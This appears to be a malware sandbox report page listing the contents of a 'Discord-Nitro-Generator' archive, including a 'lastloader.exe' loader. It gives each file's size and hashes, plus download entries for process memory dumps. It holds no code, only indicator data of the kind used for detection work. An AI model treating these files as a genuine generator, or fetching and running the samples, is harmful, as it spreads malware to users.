5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\Downloads\Discord-Nitro-Generator-main.zip

Filesize
95KB

MD5
4e3f8d26fc3212c1b27c2ea2398ad4ed

SHA1
7947db86702c322444b9aea4cfc8e4487b060328

SHA256
40f2d7e259e296a481821b01f9cbc4e8a9e5d2f75643669c9452afbbbe06558c

SHA512
d2cba9b229b488ead30631c0a5bfc6fbc5264366830fd39428338b37272f6718595d61e32545fd47d96035a602c61f6269c8fe9279838f631051936f7e26806c

Download Submit
C:\Users\Admin\Downloads\Discord-Nitro-Generator-main\lastloader.exe

Filesize
229KB

MD5
9b2b8035bbaf9833d6e847234ee5023e

SHA1
6ec9dad5457a128c8efdf78aba65ea587ed9af0e

SHA256
93ee149a8f5066e8547d306a306dcf25a145ced96466882dec36af362ca05e8c

SHA512
e54fdf9a2f86abf67db4cadefd77f89b08753f8c6a6fc6856975e9dcad9f0fa58e33c6bb763536ff5c663befc3ac6b241bfd3ce48c33ebd659b96a9c470fbde5

Download Submit
C:\Users\Admin\Downloads\Discord-Nitro-Generator-main\requirements.txt

Filesize
66B

MD5
8617adbf049d0ef100319a184ea2f8a1

SHA1
805087acb65574a91e9863e3849b99d9c2a403d3

SHA256
a4397e1bc2e1e25acc57cc00e41bf711464b826299ce5558ab02aec0b0353955

SHA512
793784b19bcd8738c87446c81686e014e754c09f8b81736d606b22974a42539f215b0c562fee36b108f55469083be2ba6c2a56cadeb89721859408d39d2baa90

Download Submit
memory/4496-476-0x0000019D78C40000-0x0000019D78C90000-memory.dmp

Filesize
320KB

Download
memory/4496-448-0x0000019D5E4B0000-0x0000019D5E4F0000-memory.dmp

Filesize
256KB

Download
memory/4496-516-0x0000019D78B60000-0x0000019D78B6A000-memory.dmp

Filesize
40KB

Download
memory/4496-517-0x0000019D78BA0000-0x0000019D78BB2000-memory.dmp

Filesize
72KB

Download
memory/4496-478-0x0000019D78C90000-0x0000019D78CAE000-memory.dmp

Filesize
120KB

Download
memory/4496-474-0x0000019D78BC0000-0x0000019D78C36000-memory.dmp

Filesize
472KB

Download
memory/4584-450-0x00000252FDA60000-0x00000252FDA82000-memory.dmp

Filesize
136KB

Download